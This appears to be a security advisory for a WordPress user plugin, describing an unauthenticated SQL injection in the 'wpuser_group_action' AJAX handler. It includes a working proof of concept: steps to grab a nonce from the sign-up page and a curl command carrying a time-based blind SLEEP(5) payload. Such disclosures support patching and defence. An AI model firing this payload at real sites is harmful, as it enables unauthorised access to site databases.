The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
1. As an unauthenticated user, visit the "Sign Up" page (by default, this is /?page_id=5, or /user/)
2. Extract the "wpuser_update_setting" nonce (CTRL+F for "wpuser_update_setting")
3. Invoke the following curl command, with the just extracted nonce, to induce a 5 seconds sleep:
time curl https://example.com/wp-admin/admin-ajax.php \
--data 'action=wpuser_group_action&group_action=x&wpuser_update_setting=<NONCE>&id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))khkM)'